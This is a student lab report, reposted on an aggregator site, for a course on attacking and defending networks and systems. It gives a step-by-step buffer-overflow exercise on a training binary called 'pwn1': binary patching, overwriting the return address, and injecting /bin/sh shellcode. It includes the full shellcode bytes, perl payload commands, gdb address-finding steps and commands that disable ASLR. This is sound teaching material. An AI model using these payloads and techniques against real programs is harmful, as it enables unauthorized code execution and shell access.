20232906 2023-2024-2 《网络与系统攻防技术》第九次作业

20232906 2023-2024-2 《网络与系统攻防技术》第九次作业

1.实验内容

本次实践的对象是一个名为pwn1的linux可执行文件。

该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。

该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode。

本次实验一共使用了三种不同方法进行缓冲区溢出攻击:

  • 利用程序中已有的代码片段getShell,手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
  • 利用foo函数的缓冲区溢出漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
  • 利用foo函数的缓冲区溢出漏洞注入一个自己制作的shellcode并运行这段shellcode。

2.实验过程

2.1 直接修改程序机器指令,改变程序执行流程

  1. 首先将pwn1.zip下载解压并放入Kali中,使用命令mv pwn1 pwn20232906将文件名进行修改,如图一所示。


    图一 修改文件名
  2. 利用objdump对pwn20232906进行反汇编,并通过管道转发给more作为输入内容便于查看,对应Linux命令如下所示:

    objdump:是在类Unix操作系统上显示关于目标文件的各种信息的命令行程序。例如,它可用作反汇编器来以汇编代码形式查看可执行文件。它是GNU Binutils的一部分,用于在可执行文件和其他二进制数据上进行精细粒度控制。objdump使用BFD库来读取目标文件的内容。

    objdump -d pwn20232906 | more
    

    如图二所示,通过查看反汇编的结果中main函数的相关部分,我们可以发现main函数调用(call)了foo函数(d7 ff ff ff),而因为有getShell函数的存在,我们便可以直接修改该程序,将调用的地址改为getShell函数的基地址即可改变程序的执行流程。


    图二 反汇编查看pwn20232906中的汇编代码
  3. 为了更改地址到getShell函数,首先我们得先弄清楚原来调用的地址d7 ff ff ff的意义。这里的地址使用了补码,且字节序为小端字节序,改写为我们习惯的大端字节序后地址就是ff ff ff d7,换算后的数值为-29h,其含义为foo函数的首地址距离call指令的下一条指令(即80484ba)的偏移量为-29,相加便可得到foo函数的地址为80484ba+ff ff ff d7=8048491

  4. 这下我们就可以确定如何修改这里的内容了,首先算出getShell的首地址相对程序下一条指令地址80484ba的偏移,即804847d-80484ba=ff ff ff c3,再将其改写为小端字节序可得c3 ff ff ff,所以我们需要将原程序中的d7 ff ff ff修改为c3 ff ff ff即可。

  5. 首先我们下载十六进制dump工具xxd,使用命令如下:

    apt install xxd
    
  6. 为了防止修改过程出现错误,故先将pwn20232906程序进行备份,使用命令:

    cp pwn20232906 pwn20232906-1
    

    然后再进行修改,通过vim打开pwn20232906-1

    vi pwn20232906-1
    

    再输入如下命令将显示模式切换成16进制模式

    :%!xxd
    

    “%!”为调用第三方操作对vim内容进行操作,如 :%!tr a-z A-Z 把全文小写字母改成大写。

    使用如下命令找到对应的数据:

    /d7ff
    

    如图三所示,可以找到对应的数据


    图三 找到程序中的对应数据内容
  7. 修改完毕数据后,首先使用如下命令将数据转换为原格式,然后再保存退出(注意顺序)

    :%!xxd -r
    
  8. 运行经过修改后的pwn20232906-1程序,可得结果如图四所示:


    图四 成功获取Shell

2.2 构造输入字符串覆盖返回地址,改变程序执行流

  1. 在2.1中我们采用了直接修改程序文件的方式获取到了Shell,但如今的程序一般都会采用签名等方式来确保程序的完整性,那么我们可不可以不修改程序文件的内容,直接通过输入特殊的字符串来修改程序的返回地址呢?答案是肯定的。如图五所示,我们再观察一下pwn1程序的汇编代码:


    图五 反汇编查看pwn20232906中的汇编代码
  2. 可以发现,在main函数调用的foo函数中仅仅只给输入的数据分配了28字节(0x1c)的空间,而堆栈的结构大致如图六所示:


图六 堆栈简单结构
  1. 也就是说,只要我们输入足够长,并将输入字符串的第33~36字节填入getShell函数的基地址(0804847d),就可以让程序跳转到getShell函数的地方了。

  2. 为了确认输入的数据应该是按照大端字节序输入还是小端字节序,我们通过命令gdb pwn20232906进入调试模式然后输入1111111122222222333333334444444412345678进行验证,如图七所示:


    图七 缓冲区溢出时寄存器数据
  3. 可以看出,eip寄存器中的值即为“4321”的ASCII码,验证了上文中的分析,这也说明我们应当使用小端字节序输入getShell函数的首地址,即7d 84 04 08

  4. 由于我们无法直接输入二进制数据,我们需要借助perl语言先生成一个包含getShell函数首地址的文件,然后通过管道让文件的内容成为pwn1的输入,使用命令如下:

    perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input
    # \x0a代表回车,如果没有则需要手动敲一下回车来结束输入
    (cat input; cat) | ./pwn20232906
    # 通过管道让input文件中的内容成为pwn20232906的输入
    
  5. 这时我们发现我们已经成功地获得了Shell,如图八所示:


    图八 成功获取Shell

2.3 注入Shellcode并执行

  1. 前两种方法能够成功的一个前提——程序中本来就含有getShell函数,但我们一般编程的时候是不会主动去为攻击者编写这样的函数。那么对于一个普通的程序来说,使用注入Shellcode的方法才能够让这个程序去执行我们想要的功能。

    Shellcode就是一段机器指令(code),通常这段机器指令的目的是为获取一个交互式的shell(像linux的shell或类似windows下的cmd.exe),所以这段机器指令被称为shellcode。

    在实际的应用中,凡是用来注入的机器指令段都通称为Shellcode,像添加一个用户、运行一条指令。

  2. 首先我们需要下载Execstack,可以通过链接http://ftp.de.debian.org/debian/pool/main/p/prelink/execstack_0.0.20131005-1+b10_amd64.deb进行下载,下载后找到文件位置使用命令dpkg -i execstack_0.0.20131005-1+b10_amd64.deb即可完成安装。

  3. 在正式开始之前,我们需要对操作系统和程序进行一些设置便于找到我们注入的数据的地址,命令如下:

    execstack -s pwn20232906    //设置堆栈可执行
    echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
    
  4. Linux下有两种基本构造攻击buf的方法:

    • retaddr+nop+shellcode
    • nop+shellcode+retaddr

    这样构造是因为retaddr在缓冲区的位置是固定的,shellcode要不在它前面,要不在它后面。

    简单来说如果缓冲区小就把shellcode放后边,如果缓冲区大就把shellcode放前边

    nop的作用一是为了当作填充数据;二是作为“着陆区/滑行区”,这样可以减小我们猜测返回地址的难度,使我们猜的返回地址只要落在任何一个nop上,自然会滑到我们的shellcode

    本次实验我们构造的结构为:anything+retaddr+nops+shellcode,其中shellcode的内容如下:

    \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\
    

    使用如下命令构建字符串并保存到input_shellcode中,其中前四字节还不确定,使用12 34h填充。

    perl -e 'print "A" x 32;print "\x1\x2\x3\x4\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x00"' > input_shellcode
    
  5. 接下来我们来确定\x4\x3\x2\x1到底该填什么。打开一个终端注入这段字符串:

    (cat input_shellcode;cat) | ./pwn20232906
    
  6. 再打开另一个终端,首先使用命令找到pwn1的进程号

    ps -ef | grep pwn20232906
    # 这里我返回了如下信息
    # root       67761   66720  0 20:29 pts/0    00:00:00 ./pwn20232906
    # root       67906   67798  0 20:29 pts/1    00:00:00 grep --color=auto pwn20232906
    

    再使用gdb调试该进程

    gdb
    (gdb) attach [pid]
    # 根据上面查找进程号的结果,这里pid应该填67761
    

    然后反汇编foo函数,查看返回指令(ret)的地址

    (gdb) disassemble foo
    # 这里我返回了如下信息
    # Dump of assembler code for function foo:
    # 0x08048491 <+0>:     push   %ebp
    # 0x08048492 <+1>:     mov    %esp,%ebp
    # 0x08048494 <+3>:     sub    $0x38,%esp
    # 0x08048497 <+6>:     lea    -0x1c(%ebp),%eax
    # 0x0804849a <+9>:     mov    %eax,(%esp)
    # 0x0804849d <+12>:    call   0x8048330 <gets@plt>
    # 0x080484a2 <+17>:    lea    -0x1c(%ebp),%eax
    # 0x080484a5 <+20>:    mov    %eax,(%esp)
    # 0x080484a8 <+23>:    call   0x8048340 <puts@plt>
    # 0x080484ad <+28>:    leave
    # 0x080484ae <+29>:    ret
    # End of assembler dump.
    

    在返回指令的地址处设置断点,之后在另外一个终端中按下回车,然后再使用c使程序继续运行

    break *<address>
    # 根据上面的结果,这里的<address>应该改为0x080484ae
    # 在运行程序的终端按下回车
    (gdb) c
    

    待程序运行到断点处,查看此时的esp寄存器的值,获得我们注入的字符串的地址

    (gdb) info r esp
    # 这里我返回了如下信息
    # esp            0xffffd02c          0xffffd02c
    

    我们使用如下指令查看该地址附近的数据

    (gdb) x/16x 0xffffd02c
    # 0xffffd02c:     0x04030201      0x90909090      0xc0319090      0x2f2f6850
    # 0xffffd03c:     0x2f686873      0x896e6962      0x895350e3      0xb0d231e1
    # 0xffffd04c:     0x0080cd0b      0x00333231      0x080484af      0x00000001
    # 0xffffd05c:     0xffffd0f4      0xf7e1dff4      0x080484d0      0xf7ffcba0
    
    (gdb) x/16x 0xffffcfec
    # 0xffffcfec:     0x080484ad      0xffffd00c      0x0000000c      0x00000000
    # 0xffffcffc:     0x00000000      0x00000000      0x00000000      0x00000013
    # 0xffffd00c:     0x41414141      0x41414141      0x41414141      0x41414141
    # 0xffffd01c:     0x41414141      0x41414141      0x41414141      0x41414141
    

    从0xffffd02c开始观察,可以发现数据采用小端字节序,并且将返回地址改为ff ff d0 30就可以让程序执行Shellcode,这样一来\x1\x2\x3\x4就应该修改为\x30\xd0\xff\xff,于是我们便重新利用perl语言,将返回地址修改正确,并在最后加上回车(0x0a),然后重新运行程序。

    perl -e 'print "A" x 32;print "\x30\xd0\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x00\x0a"' > input_shellcode
    (cat input_shellcode;cat) | ./pwn20232906
    
  7. 这时我们发现我们已经成功地获得了Shell,如图九所示:


    图九 成功获取Shell

3.问题及解决方案

  • 问题1:在2.3时,使用命令execstack操作系统提示——无法定位软件包 execstack

  • 问题1解决方案:通过百度搜索,我找到了execstack的官方网站并成功找到了execstack的安装包,由于kali是Debian的发行版,所以选择了Debian版本的进行下载,具体下载地址见下面的链接。进入链接后在Download处即可找到资源的下载链接。

    https://debian.pkgs.org/10/debian-main-amd64/execstack_0.0.20131005-1+b10_amd64.deb.html

    下载到本地后,使用apt的命令即可完成安装

    apt install ./execstack_0.0.20131005-1+b10_amd64.deb
    
  • 问题2:在2.3中,获取地址后修改字符串的数据然后重新执行发现依旧不成功

  • 问题2解决方案:使用gdb进行调试,发现了每一次esp中的地址都不相同,结合实验指导书的相关内容,发现是没有关闭地址随机化,使用相应命令关闭地址随机化即可。

    echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
    

4.学习感悟、思考等

本次实验进行的是缓冲区溢出攻击,通过动手实践的方式我弄懂了缓冲区溢出的基本原理和常用的方法以及可执行程序的分析方法。在本次实验中,经过王老师的讲解和刘老师的博客,我成功地入门了缓冲区溢出这一个我曾以为困难重重的课题。同时,此次实验也使我对于二进制文件有了初步的了解,拿到了二进制文件,我也不再会不知所措,而是可以通过工具对其进行一定的分析,可以说收获颇多。

本次实验也暴露出了我在某些方面还有所欠缺,例如对于汇编语言的了解还不够深入,很多命令还需要老师的点拨才能够明白它的功能;本次实验中的Shellcode是老师直接提供给我的,是只针对于获得Shell这个功能的。如果要实现其他的功能,编写自己的Shellcode,还需要我对于Shellcode的相关知识认真学习;本次实验对于地址随机化和堆栈保护都进行了关闭,那么在地址随机化和堆栈保护开启的时候如何进行缓冲区溢出攻击也值得我深入思考。只有这样我才能够在此次实验的基础上取得更大的进步。

最后,感谢王老师和刘老师的细心讲解和耐心帮助,也感谢在实验过程中给我帮助的同学们。正因为有你们的帮助我才能够顺利地完成本次实验,谢谢!

参考资料

  • 0x11_MAL 逆向与Bof基础 - wildlinux
  • execstack_0.0.20131005-1+b10_amd64.deb

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mfbz.cn/a/610044.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

vscode远程免密ssh原理与实操方法

什么是SSH SSH是一种加密协议&#xff0c;全称为Secure Shell&#xff0c;用于安全地远程登录到服务器或其他远程设备上执行命令或传输文件。它提供了一种安全的加密通信机制&#xff0c;使得远程登录和文件传输等操作不会被恶意攻击者窃取或篡改&#xff0c;确保了数据的保密…

全球10KM土地利用程度数据

全球10KM土地利用程度数据 数据介绍 “一带一路”监测区域土地利用程度指数平均值为0.34&#xff0c;不同区域利用程度差异明显&#xff0c;但总体上高值区域与人口分布的稠密区域吻合。中南半岛、南亚、欧洲和小亚细亚半岛等地海拔较低&#xff0c;水热组合条件较好&#xff…

SqlServer数据库导出表结构和数据为脚本文档

需求&#xff1a;把数据库里的数据结构及数据存为脚本&#xff0c;下次一键执行数据库 操作方法&#xff1a; 一、右击该数据库&#xff0c;选择任务 二、下一步 三、如果导出整个数据库就默认&#xff0c;若导出指定的表和视图就选择具体的数据库对象 四、选择另存为脚本文件…

分解质因数-第12届蓝桥杯国赛Python真题解析

[导读]&#xff1a;超平老师的Scratch蓝桥杯真题解读系列在推出之后&#xff0c;受到了广大老师和家长的好评&#xff0c;非常感谢各位的认可和厚爱。作为回馈&#xff0c;超平老师计划推出《Python蓝桥杯真题解析100讲》&#xff0c;这是解读系列的第61讲。 分解质因数&#…

亚信安慧AntDB:解锁数智化的新时代

亚信安慧AntDB的融合实时的特性使得它在数据库领域独树一帜。传统的数据库系统往往只能追求数据的准确性和一致性&#xff0c;但在实际的业务场景中&#xff0c;这些特性并不能满足企业的需求。AntDB的出现打破了传统束缚&#xff0c;为企业带来了全新的数据处理方式&#xff0…

测试用例设计方法-状态迁移图法

一、介绍&#xff1a; 在软件测试领域中&#xff0c;状态迁移图法是一种极为重要且有效的测试方法。状态迁移图法侧重于分析和测试系统中存在的各种状态以及它们之间的迁移关系。所谓状态&#xff0c;就是系统在特定条件下所处的情况或模式&#xff0c;而迁移则是状态之间的转换…

抖音又出王炸级APP,免费的AI写真神器,一键生成不同场景的写真大片(附保姆级教程)

以前想要拍出一组写真大片&#xff0c;是不是还得跑摄像馆&#xff0c;化妆、换装、各种摆 pose、场景布置&#xff0c;少说也要折腾一上午&#xff0c;而且花费还不少。 而现在&#xff0c;有了 AI&#xff0c;在家里&#xff0c;一个人&#xff0c;一部手机&#xff0c;就能…

微同城小程序源码 轻松制作本地生活活动赚钱 带完整的安装代码包以及搭建教程

近年来&#xff0c;本地生活服务市场蓬勃发展&#xff0c;人们对于周边的生活信息、活动资讯等需求日益增长。然而&#xff0c;传统的信息发布方式存在诸多不便&#xff0c;如信息更新不及时、传播范围有限等。微同城小程序源码应运而生。它利用小程序的便捷性和普及性&#xf…

9.为什么有时候会“烫烫烫”——之函数栈桢

目录 1. 什么是函数栈帧 2. 理解函数栈帧能解决什么问题呢&#xff1f; 3. 函数栈帧的创建和销毁解析 3.1 什么是栈&#xff1f; 3.2 认识相关寄存器和汇编指令 3.3 解析函数栈帧的创建和销毁 小知识&#xff1a;烫烫烫~ Q&A 1. 什么是函数栈帧 我们在写C语言代码…

“设置display:block-inline的li或div中添加文字后,导致li或div排版掉落、错位”的原因及解决方法

先说我想实现的效果 然后我就很快的列出来了css .f_wornning{background: url("/assets/images/icon_kaung.png")no-repeat 100% 100%;background-size: 100% 100%;margin: 10px 20px;height: 3rem;line-height: 3rem;color: #d8eebd;.f_wornning_icon{height: 2rem;…

DDoS攻防,本质上是成本博弈!

在互联网里&#xff0c;分布式拒绝服务&#xff08;DDoS&#xff09;攻击作为一种常见的网络威胁&#xff0c;持续对网站、在线服务和企业基础设施构成严重挑战。本文旨在探讨实施DDoS攻击的大致成本、以及企业如何采取有效措施来防范此类攻击&#xff0c;确保业务连续性和网络…

【图像增强(空域)】基于直方图增强的图像增强及Matlab仿真

1. 摘要 图像的灰度直方图表示灰度图像中具有每种灰度像素的个数&#xff0c;反映了图像中每种灰度级出现的频率&#xff0c;是图像的基本统计特征之一。直方图均衡方法因为其有效性和简单性已成为图像对比度增强的最常用的方法。其基本思想是根据输入图像的灰度概率分布来确定…

Verilog复习(三)| Verilog语言基础

四种基本的逻辑值 0&#xff1a;逻辑0或“假”1&#xff1a;逻辑1或“真”x&#xff1a;未知z&#xff1a;高阻 三类常量 整型数&#xff1a;简单的十进制格式&#xff0c;基数格式&#xff08;5’O37&#xff0c;4’B1x_01&#xff09; 格式&#xff1a; <size><’b…

微搭低代码入门05文件的上传和下载

目录 1 创建数据源2 创建应用3 创建页面4 设置导航功能5 文件上传6 文件下载总结 小程序中&#xff0c;我们通常会有文件的上传和下载的需&#xff0c;在微搭中&#xff0c;文件是存放在云存储中&#xff0c;每一个文件都会有一个唯一的fileid&#xff0c;我们本篇就介绍如何通…

docker-compose管理jenkins

1.安装docker和compose 1.docker 更新系统&#xff1a;yum update 安装依赖项&#xff1a;yum install -y yum-utils device-mapper-persistent-data lvm2 配置镜像源&#xff1a;yum-config-manager --add-repo http://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce…

js api part5

学生信息管理系统 现在着急没看..........5.15后一定看 没css&#xff1f;c <!DOCTYPE html> <html lang"en"><head><meta charset"UTF-8" /><meta name"viewport" content"widthdevice-width, initial-scal…

桥接模式类图与代码

欲开发一个绘图软件&#xff0c;要求使用不同的绘图程序绘制不同的图形。以绘制直线和圆形为例&#xff0c;对应的绘图程序如表 7.7 所示。 根据绘图软件的扩展性要求&#xff0c;该绘图软件将不断扩充新的图形和新的绘图程序。为了避免出现类爆炸的情况&#xff0c;现采用桥接…

国外大模型使用成本比较

计算每种层级的LLM使用的大致总成本。考虑到每次使用LLM需要3个输入token产生1个输出token的假设&#xff0c;我们可以这样估算总成本&#xff1a; 计算单次使用的token总数&#xff1a; 输入token&#xff1a;3个输出token&#xff1a;1个总计&#xff1a;3输入 1输出 4个to…

服务号转订阅号的操作步骤(吐血整理)

服务号和订阅号有什么区别&#xff1f;服务号转为订阅号有哪些作用&#xff1f;我们知道&#xff0c;公众号分为服务号和订阅号两种&#xff0c;服务号只能企业才可以申请&#xff0c;订阅号是企业和个人都可以申请。其中最大的区别是服务号一个月只能发送4次群发&#xff0c;但…

《金融时报》专刊!量子计算即将迎来新一轮投资浪潮!

内容来源&#xff1a;量子前哨&#xff08;ID&#xff1a;Qforepost&#xff09; 文丨 王珩 浪味仙 排版丨沛贤 深度好文&#xff1a;2000字丨10分钟阅读 编者按&#xff1a;近日&#xff0c;全球著名财经媒体《金融时报》(financial Time)发布专题报道称&#xff0c;澳大利亚…